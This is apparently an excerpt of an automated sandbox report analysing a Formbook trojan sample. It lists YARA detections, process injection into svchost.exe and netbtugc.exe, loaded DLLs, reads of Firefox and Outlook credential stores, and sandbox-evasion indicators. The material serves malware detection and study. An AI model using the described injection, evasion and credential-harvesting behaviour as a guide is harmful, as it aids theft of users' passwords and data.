            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02829FD04_2_02829FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBA0AF4_2_02DBA0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBB8B44_2_02DBB8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBB9D64_2_02DBB9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBADD84_2_02DBADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBBD6C4_2_02DBBD6C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03587E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0352B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 035BF290 appears 105 times
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: String function: 00C19CB3 appears 31 times
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: String function: 00C30A30 appears 46 times
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: String function: 00C2F9F2 appears 40 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0313F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 030AB970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03107E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 030F5130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0312EA12 appears 86 times
            Source: BP-50C26_20241220_082241.exe, 00000000.00000003.2040573608.0000000004003000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BP-50C26_20241220_082241.exe
            Source: BP-50C26_20241220_082241.exe, 00000000.00000003.2041836600.00000000041AD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BP-50C26_20241220_082241.exe
            Source: BP-50C26_20241220_082241.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/7
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C837B5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C710BF AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe File created: C:\Users\user\AppData\Local\Temp\resharpen
            Source: BP-50C26_20241220_082241.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028FF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4506373948.0000000002920000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4506373948.0000000002955000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2372684776.0000000002920000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2372684776.0000000002955000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: BP-50C26_20241220_082241.exe ReversingLabs: Detection: 36%
            Source: unknown Process created: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: BP-50C26_20241220_082241.exe Static file information: File size 1565696 > 1048576
            Source: BP-50C26_20241220_082241.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: BP-50C26_20241220_082241.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: BP-50C26_20241220_082241.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: BP-50C26_20241220_082241.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: BP-50C26_20241220_082241.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: BP-50C26_20241220_082241.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: BP-50C26_20241220_082241.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111344894.000000000093E000.00000002.00000001.01000000.00000004.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4506386913.000000000093E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: BP-50C26_20241220_082241.exe, 00000000.00000003.2038587974.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, BP-50C26_20241220_082241.exe, 00000000.00000003.2041836600.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2093566111.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095219887.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.000000000321E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.0000000003080000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2194533815.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2187698131.0000000002D1A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: BP-50C26_20241220_082241.exe, 00000000.00000003.2038587974.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, BP-50C26_20241220_082241.exe, 00000000.00000003.2041836600.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2093566111.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095219887.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4508062336.000000000321E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.0000000003080000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2194533815.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2187698131.0000000002D1A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2187228592.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156302707.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4506792247.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4506373948.000000000289E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2476352086.0000000035C4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4506373948.000000000289E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2476352086.0000000035C4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2187228592.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156302707.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4506792247.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
            Source: BP-50C26_20241220_082241.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: BP-50C26_20241220_082241.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: BP-50C26_20241220_082241.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: BP-50C26_20241220_082241.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: BP-50C26_20241220_082241.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C322CB push ds; ret 0_2_00C322E2
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C30A76 push ecx; ret 0_2_00C30A89
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004017E5 push ebp; retf 003Fh 2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0350225F pushad ; ret 2_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035027FA pushad ; ret 2_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx 2_2_035309B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0350283D push eax; iretd 2_2_03502858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0350135E push eax; iretd 2_2_03501369
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Code function: 3_2_02F1C2E9 push FFFFFFBAh; ret 3_2_02F1C2EB
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Code function: 3_2_02F1129D push ebx; ret 3_2_02F1129E
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Code function: 3_2_02F1324A push ebx; iretd 3_2_02F13271
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Code function: 3_2_02F130A7 push ebx; iretd 3_2_02F13271
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Code function: 3_2_02F11903 pushad ; retf 3_2_02F11904
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Code function: 3_2_02F16F2B push 00000038h; iretd 3_2_02F16F2F
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe Code function: 3_2_02EFD51A push esp; ret 3_2_02EFD51B
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030B09AD push ecx; mov dword ptr [esp], ecx 4_2_030B09B6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02812238 pushad ; iretd 4_2_02812239
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0281AB37 push 00000038h; iretd 4_2_0281AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02810EAB push ebp; retf 4_2_02810EAC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02816E56 push ebx; iretd 4_2_02816E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02816CB3 push ebx; iretd 4_2_02816E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0281101F push es; iretd 4_2_02811027
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0281D1B0 push es; ret 4_2_0281D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02801126 push esp; ret 4_2_02801127
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C2F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00CA1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | API/Special instruction interceptor: Address: 14E2B24
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
